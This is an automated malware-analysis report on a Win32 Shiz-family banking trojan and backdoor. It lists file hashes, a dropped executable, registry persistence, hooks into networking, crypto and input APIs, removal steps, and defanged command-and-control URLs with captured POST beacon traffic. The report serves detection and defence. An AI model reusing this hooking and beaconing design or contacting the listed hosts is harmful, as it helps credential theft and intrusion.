HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Generic.6913297 (B) (Emsisoft), Gen:Variant.Barys.508 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: c7f6de3628ab6a3add61ad78a209e742
SHA1: 2c7fef251672220f6b3b75a5f6874692c27c07a9
SHA256: e6e8917ae8e817dc188107ee47297fae68fff632cd77f607cc592436e302cfb9
SSDeep: 6144:iesVRRuMOteGgex1JhEc9otunrGuSnKou8I:iesVRRZOteCJb9Wurcu8I
Size: 279880 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 1996-10-11 00:46:34
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
mscorsvw.exe:1912
%original file name%.exe:1500
The Trojan injects its code into the following process(es):
winlogon.exe:716
Explorer.EXE:840
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:1500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\AppPatch\hwcmqr.exe (1983 bytes)
%System%\config\software (1609 bytes)
%System%\config\SOFTWARE.LOG (3715 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\7E.tmp (0 bytes)
Registry activity
The process mscorsvw.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "2340000"
The process %original file name%.exe:1500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB C4 28 90 5D 83 6B 13 3E 56 5E 65 05 DF 12 55"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\hwcmqr.exe_, \??\%WinDir%\apppatch\hwcmqr.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = "pEìX£bÀ¸¬qÄHF‡KöJîp>¢°oD¬òd¼Œ¤Kô1,Ã…Â $ë›ÛÌ«â€Â¹l}Ë {Å“zΙC%é[qñl4ì;û´[Ã’#»Û:ÑU„„Ãâ€Ã‚Â\±ª²DÆ’uœ¡Ü¼);¼\Æ’tµ2â€ÂkDùâ€Âaâ€Â*›cü$}Sô|ë$¤ô{¬q³#sÃ…Ã¥\yuJÛËu©|ù¢rKã!$’‹‹b±ÃÄ£ã“ÉUcdÃÂÄZ¡r»ôâ€Â)Û©Š]“QlYÛl]$$D´ƒÌ£Q$aŒ‚*™ü›ÙóÃÂÃÂ=éÃâ€Ãƒâ€˜Ãƒâ€˜Ã¢â‚¬Â°Ã‚¬q9|áÃÂù’‘ÃÂéšÄR"
Dropped PE files
MD5 | File path |
---|---|
1816cb65b60dfd5cda67b640d2cc9c10 | c:\WINDOWS\AppPatch\hwcmqr.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in CRYPT32.dll:
CertVerifyCertificateChainPolicy
The Trojan installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpSendRequestA
InternetCloseHandle
The Trojan installs the following user-mode hooks in USER32.dll:
GetWindowTextA
GetClipboardData
SendInput
GetMessageA
GetMessageW
TranslateMessage
The Trojan installs the following user-mode hooks in ADVAPI32.dll:
CryptEncrypt
The Trojan installs the following user-mode hooks in WS2_32.dll:
WSASend
recv
gethostbyname
WSARecv
send
The Trojan installs the following user-mode hooks in kernel32.dll:
CreateFileW
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
mscorsvw.exe:1912
%original file name%.exe:1500 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\AppPatch\hwcmqr.exe (1983 bytes)
%System%\config\software (1609 bytes)
%System%\config\SOFTWARE.LOG (3715 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Emsi Software GmbH
Product Name: Linsang
Product Version: 2.2.5.6
Legal Copyright: Sphingometer
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 4.7.8.6
File Description: gladless
Comments:
Language: Language Neutral
Company Name: Emsi Software GmbHProduct Name: LinsangProduct Version: 2.2.5.6Legal Copyright: SphingometerLegal Trademarks: Original Filename: Internal Name: File Version: 4.7.8.6File Description: gladlessComments: Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.vz | 4096 | 9947 | 10240 | 4.35204 | 4f6e09634da4c90b7dd953ce1702f42c |
.KU | 16384 | 11776 | 11776 | 4.89534 | 837ef1c592460db53bb0a2ddaec45c79 |
.tdQZB | 28672 | 107001 | 3072 | 4.66073 | b0ca603f95ea4181027ccc7ab958e479 |
.OymKZB | 139264 | 108560 | 109056 | 5.53819 | 51641e1b65a2cb2835cc21d8dff11a63 |
.pnxz | 249856 | 437644 | 1536 | 4.39827 | d335fd78d0ffe50bb1a6551f538495f7 |
.npt | 688128 | 235499 | 11264 | 5.13754 | 332d7b4a3da2fb0215a3587537bf678c |
.UDTsep | 925696 | 109614 | 110080 | 5.53679 | 8517b14b71e4b28a1ba2cfb26fa65561 |
.sIjI | 1036288 | 23580 | 5120 | 3.69965 | dacc7fed81e832a9a1264511b1d1ed52 |
.IEE | 1060864 | 509779 | 2560 | 3.30907 | 82a69fd3007f3899be75149a3e4656bc |
.rsrc | 1572864 | 8416 | 8704 | 3.59943 | 0fa1b70cf9b960fb9ec5d08aa700265d |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://galin.eu/login.php | 91.195.240.135 |
hxxp://lyman.eu/login.php | 81.2.194.128 |
hxxp://galor.eu/login.php | 79.96.182.129 |
hxxp://lykef.eu/login.php | 86.124.164.25 |
hxxp://ganiq.eu/login.php | 46.249.43.105 |
hxxp://sedoparking.com/login.php | |
hxxp://gatun.eu/login.php | 178.210.94.54 |
hxxp://gadoc.eu/login.php | 176.221.32.120 |
hxxp://lyset.eu/login.php | 91.212.28.29 |
hxxp://purol.eu/login.php | 82.165.106.203 |
hxxp://pumot.eu/login.php | 217.160.64.207 |
hxxp://volym.eu/login.php | 194.9.94.79 |
hxxp://purac.eu/login.php | 62.197.128.123 |
hxxp://vocom.eu/login.php | 109.235.63.103 |
hxxp://lykil.eu/login.php | 194.9.94.235 |
hxxp://ganar.eu/login.php | 72.52.4.120 |
hxxp://lysen.eu/login.php | 89.31.143.6 |
hxxp://lyxos.eu/login.php | 89.31.143.12 |
hxxp://vocer.eu/login.php | 85.13.129.76 |
hxxp://vonak.eu/login.php | 62.182.63.62 |
hxxp://ganed.eu/login.php | 46.28.105.107 |
hxxp://galik.eu/login.php | 185.51.65.84 |
hxxp://volez.eu/login.php | 78.47.242.93 |
hxxp://www.gss.dr.dk/login.php | |
hxxp://purex.eu/login.php | 149.216.106.61 |
hxxp://corporate.evonik.com/en/ | 149.216.106.100 |
hxxp://corporate.evonik.com/en/Pages/default.aspx | 149.216.106.100 |
hxxp://gatic.eu/login.php | 165.160.13.20 |
hxxp://qexer.eu/login.php | 217.146.69.17 |
hxxp://gacek.eu/login.php | 77.55.97.141 |
hxxp://gadak.eu/login.php | 209.140.30.61 |
hxxp://gater.eu/login.php | 62.149.128.154 |
hxxp://lyken.eu/login.php | 194.9.94.86 |
hxxp://lymos.eu/login.php | 195.8.208.58 |
hxxp://www.gater.eu/login.php | 62.149.128.45 |
hxxp://galev.eu/login.php | 66.96.131.56 |
hxxp://purel.eu/login.php | 85.13.132.239 |
hxxp://lyran.eu/login.php | 46.30.212.173 |
hxxp://galen.eu/login.php | 109.235.63.103 |
hxxp://vocab.eu/login.php | 109.235.63.103 |
hxxp://www.dr.dk/login.php | 159.20.6.22 |
hxxp://volar.eu/login.php | 109.235.63.103 |
hxxp://www.vocer.org/login.php | 85.13.129.76 |
hxxp://www.galin.eu/login.php | 72.52.4.90 |
galip.eu | 91.33.209.210 |
www.bing.com | 204.79.197.200 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysen.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 301 Moved Permanently
Date: Mon, 10 Nov 2014 20:01:19 GMT
Server: Apache
X-UD-Host: webspace.udag.de
X-UD-Method: header
Location: hXXp://VVV.dr.dk/login.php
Connection: close
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyset.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.0 404 Not Found
Date: Mon, 10 Nov 2014 20:01:12 GMT
Server: Apache
Set-Cookie: fe_typo_user=b1c1e88940c35517b343ca120e68d52a; path=/
Content-Length: 1645
Connection: close
Content-Type: text/html
<?xml version="1.0" encoding="utf-8"?>.<!DOCTYPE html. PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<?xml-stylesheet href="#internalStyle" type="text/css"?>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />..<meta name="robots" content="noindex, follow" />...<title>TYPO3 Error</title>...<base href="hXXp://lyset.eu/" />...<link rel="stylesheet" href="typo3/sysext/t3skin/stylesheets/standalone/errorpage-message.css" />.</head>..<body class="t3-message-page t3-errorpage-message">..<div class="t3-message-page-container">..<div class="t3-message-page-logo">...<img src="typo3/sysext/t3skin/images/login/typo3logo-white-greyback.gif" alt="TYPO3 logo" />..</div>..<div class="shadow-box-top-428"></div>..<div class="t3-message-page-message typo3-message message-error">...<h1>Page Not Found</h1>...<p class="t3-error-text">Reason: File "login.php" was not found (2)!</p>..</div>..<div class="shadow-box-bottom-424"></div>.</div>..<div id="t3-footer">..<div id="t3-copyright-notice">...TYPO3 is an open source content management system. To maintain the quality of the system and to improve it, please help us by donating....TYPO3 CMS. Copyright .. 1998-2011 Kasper Sk..rh..j. Extensions are copyright of
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galen.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 10 Nov 2014 20:02:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.4-14 deb7u8
Set-Cookie: PHPSESSID=m3a1jsr8297hhd5f2r8nvd0so2; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
<div id="saleslander">. <div class="inner clearfix">.. <span class="icon"></span>. . <h1>galen.eu<span> is for sale!</span></h1>. <h3>Buying this domain means full control and ownership.</h3>. <div class="domain_actions">. <div class="box_payments">. <p>Price in Words:<br/><b>two thousand, four hundred and ninety-nine</b></p>. <p>Domain Punycode:<br/><b class="punycode">galen.eu</b></p>. <p>Payment options:</p><p class="paymentimg">. <img style="border:0;" src="hXXp://galen.eu/images/payment/visa.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="height:28px;" src="hXXp://galen.eu/images/payment/visa_verified.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="border:0;" src="http://galen.eu/images/payment/mastercard.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />. <img style="height:28px;" src="hXXp://galen.eu/images/payment/mastercard_securecode.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mas
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatic.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 200 OK
Connection: close
Date: Mon, 10 Nov 2014 20:01:28 GMT
Content-Length: 94
X-Powered-By: Servlet/2.4 JSP/2.0
<html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: volar.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 10 Nov 2014 20:01:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.26-1~dotdeb.1
Set-Cookie: PHPSESSID=f8hggo3ojirvjakuj6m8ijcju4; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
<div id="saleslander">. <div class="inner clearfix">.. <span class="icon"></span>. . <h1>volar.eu<span> is for sale!</span></h1>. <h3>Buying this domain means full control and ownership.</h3>. <div class="domain_actions">. <div class="box_payments">. <p>Price in Words:<br/><b>nine hundred and ninety-nine</b></p>. <p>Domain Punycode:<br/><b class="punycode">volar.eu</b></p>. <p>Payment options:</p><p class="paymentimg">. <img style="border:0;" src="hXXp://volar.eu/images/payment/visa.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="height:28px;" src="http://volar.eu/images/payment/visa_verified.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="border:0;" src="hXXp://volar.eu/images/payment/mastercard.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />. <img style="height:28px;" src="hXXp://volar.eu/images/payment/mastercard_securecode.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gater.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 301 Moved Permanently
Date: Mon, 10 Nov 2014 20:01:31 GMT
Server: Apache
Location: hXXp://VVV.gater.eu/login.php
Content-Length: 237
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://VVV.gater.eu/login.php">here</a>.</p>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadoc.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:13 GMT
Server: Apache
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>...
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyman.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:00:57 GMT
Server: Apache/1.3.36 (Unix) mod_ssl/2.8.27 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<html>..<head>..<title>The domain name is registered</title>..<meta http-equiv="Content-Type" content="text/html; charset=windows-1250">..<meta name="description" content="FORPSI je Evropsk. housingov. spole.nost. Nab.z. slu.by webhostingu, serverhostingu, registrace dom.nov.ch jmen a www str.nky na serverech Windows/Linux.">..<meta name="keywords" content="forpsi,webhosting,dom.na,dom.ny,hosting,server,serverhosting,housing,serverhousing,adsl,wifi,wi-fi,domain,domains">..<style type="text/css">..<!--..html, body {...margin: 0px;...padding: 0px;...height: 100%;...background-color: #32549c;..}..#container {...height: 100%;...width: 100%;...text-align: center;..}..#box {...width: 520px;...position: relative;...margin: 0 auto;...top: 160px;...border: 4px solid #cccccc;...background-color: #FFFFFF;...background-image: url(img/logo_forpsi.gif);...background-repeat: no-repeat;...background-position: left top;...padding: 20px;...font-family : Verdana, Arial, Helvetica, sans-serif;...font-size: 14px;...color: #38506b;..}..#box2 {...width: 520px;...position: relative;...margin: 0 auto;...top: 160px;...border: 4px solid #cccccc;...background-color: #FFFFFF;...padding: 20px;...font-family : Verdana, Arial, Helvetica, sans-serif;...font-size: 14px;...color: #38506b;..}...#flag {...position: absolute;...left: 95px;...top: 60px;..}...txt {...font-family: Verdana, Arial, Helvetica, sans-serif;...font-size:
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocom.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 10 Nov 2014 20:01:15 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.26-1~dotdeb.1
Set-Cookie: PHPSESSID=c8iaii6iap338nn3vbgirvg2u0; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
<div id="saleslander">. <div class="inner clearfix">.. <span class="icon"></span>. . <h1>vocom.eu<span> is for sale!</span></h1>. <h3>Buying this domain means full control and ownership.</h3>. <div class="domain_actions">. <div class="box_payments">. <p>Price in Words:<br/><b>nine hundred and ninety-nine</b></p>. <p>Domain Punycode:<br/><b class="punycode">vocom.eu</b></p>. <p>Payment options:</p><p class="paymentimg">. <img style="border:0;" src="hXXp://vocom.eu/images/payment/visa.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="height:28px;" src="http://vocom.eu/images/payment/visa_verified.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="border:0;" src="hXXp://vocom.eu/images/payment/mastercard.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />. <img style="height:28px;" src="hXXp://vocom.eu/images/payment/mastercard_securecode.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocom.eu
Content-Length: 9
Pragma: no-cache
Cookie: PHPSESSID=c8iaii6iap338nn3vbgirvg2u0
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 10 Nov 2014 20:01:16 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.26-1~dotdeb.1
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
<div id="saleslander">. <div class="inner clearfix">.. <span class="icon"></span>. . <h1>vocom.eu<span> is for sale!</span></h1>. <h3>Buying this domain means full control and ownership.</h3>. <div class="domain_actions">. <div class="box_payments">. <p>Price in Words:<br/><b>nine hundred and ninety-nine</b></p>. <p>Domain Punycode:<br/><b class="punycode">vocom.eu</b></p>. <p>Payment options:</p><p class="paymentimg">. <img style="border:0;" src="hXXp://vocom.eu/images/payment/visa.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="height:28px;" src="http://vocom.eu/images/payment/visa_verified.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="border:0;" src="hXXp://vocom.eu/images/payment/mastercard.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />. <img style="height:28px;" src="hXXp://vocom.eu/images/payment/mastercard_securecode.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lykef.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Mon, 10 Nov 2014 20:00:40 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4
Connection: close
'OK'..
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyxos.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 200 OK
Date: Mon, 10 Nov 2014 20:01:19 GMT
Server: Apache
X-UD-Host: webspace.udag.de
X-UD-Method: ud_standard
Vary: Accept-Encoding
Content-Length: 3207
Connection: close
Content-Type: text/html
<html>.<head>.<meta name="keywords" content=">">.<meta name="description" content="Hier entsteht ">.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.<title></title>.<style type="text/css">.html, body {..height:100%;..margin: 0;..padding: 0;..background-color: #FFF;..font-family: Arial, Verdana, sans-serif;..color: #444;.}..body { text-align: center;}...a:link,.a:hover,.a:visited,.a:focus {..margin: 0;..padding: 0;..border: none;.}...dvLink:link, .dvLink:hover, .dvLink:visited, .dvLink:focus {..background: url("hXXp://VVV.united-domains.de/images/vorlagen/vorlage_pfeil.png") left center no-repeat;. border: 0 none;. font-weight: normal;. 1margin-top: 5px;. padding-left: 12px;. text-decoration: underline;. color: #444;.}...dvLink:hover {..color: #003D86;..text-decoration: underline;.}..#wrapper-vorlage {..font-family: Arial, Verdana, sans-serif;..background: url("hXXp://VVV.united-domains.de/images/vorlagen/vorlage_hg.png") repeat-x;..width: 100%;..height: 100%;.}..#vorlage {..width: 450px;..margin: 0 auto;..text-align: center;..min-height: 500px;.}..#logo {. border: none;. padding-top: 57px;. margin: 0;.}..#logo img {. border: none;.}..#title {..font-size: 18px;..color: #003d86;. padding-top: 29px;. margin: 0;.}..#content {..background: url("hXXp://VVV.united-domains.de/images/vorlagen/vorlage_kugel.png") 260px 150px transparent no-repeat;..font-size: 14px;..line-height: 18px;..margin-top: 23px;..padding: 29p
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyset.eu
Content-Length: 9
Pragma: no-cache
Cookie: fe_typo_user=b1c1e88940c35517b343ca120e68d52a
....~7.~'
HTTP/1.0 404 Not Found
Date: Mon, 10 Nov 2014 20:01:12 GMT
Server: Apache
Set-Cookie: fe_typo_user=e8e31fcf457afc81edea23504d0c1def; path=/
Content-Length: 1645
Connection: close
Content-Type: text/html
<?xml version="1.0" encoding="utf-8"?>.<!DOCTYPE html. PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<?xml-stylesheet href="#internalStyle" type="text/css"?>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />..<meta name="robots" content="noindex, follow" />...<title>TYPO3 Error</title>...<base href="hXXp://lyset.eu/" />...<link rel="stylesheet" href="typo3/sysext/t3skin/stylesheets/standalone/errorpage-message.css" />.</head>..<body class="t3-message-page t3-errorpage-message">..<div class="t3-message-page-container">..<div class="t3-message-page-logo">...<img src="typo3/sysext/t3skin/images/login/typo3logo-white-greyback.gif" alt="TYPO3 logo" />..</div>..<div class="shadow-box-top-428"></div>..<div class="t3-message-page-message typo3-message message-error">...<h1>Page Not Found</h1>...<p class="t3-error-text">Reason: File "login.php" was not found (2)!</p>..</div>..<div class="shadow-box-bottom-424"></div>.</div>..<div id="t3-footer">..<div id="t3-copyright-notice">...TYPO3 is an open source content management system. To maintain the quality of the system and to improve it, please help us by donating....TYPO3 CMS. Copyright .. 1998-2011 Kasper Sk..rh..j. Extensions are copyright of
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galik.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Mon, 10 Nov 2014 20:01:20 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Wed, 03 Sep 2014 09:20:02 GMT
ETag: "1007b4-70e-50225bda086dd"
Accept-Ranges: bytes
Content-Length: 1806
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en" lang="en">.<head>. <title>ERROR 404 - Not Found!</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <meta name="robots" content="noindex" />. <style type="text/css"><!--. body {. color: #444444;. background-color: #EEEEEE;. font-family: 'Trebuchet MS', sans-serif;. font-size: 80%;. }. h1 {}. h2 { font-size: 1.2em; }. #page{. background-color: #FFFFFF;. width: 60%;. margin: 24px auto;. padding: 12px;. }. #header {. padding: 6px ;. text-align: center;. }. .status3xx { background-color: #475076; color: #FFFFFF; }. .status4xx { background-color: #C55042; color: #FFFFFF; }. .status5xx { background-color: #F2E81A; color: #000000; }. #content {. padding: 4px 0 24px 0;. }. #footer {. color: #666666;. background: #f9f9f9;. padding: 10px 20px;. border-top: 5px #efefef solid;. font-size: 0.8em;. text-align: center;. }. #footer a {. color: #999999;. }. --></style>.</head>.<body>. <div id="page">. <div id="header" class="status4xx">. <h1>ERROR 404 - Not Found!</h1>. </div>. <div id="content"
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gacek.eu
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 404 Not Found
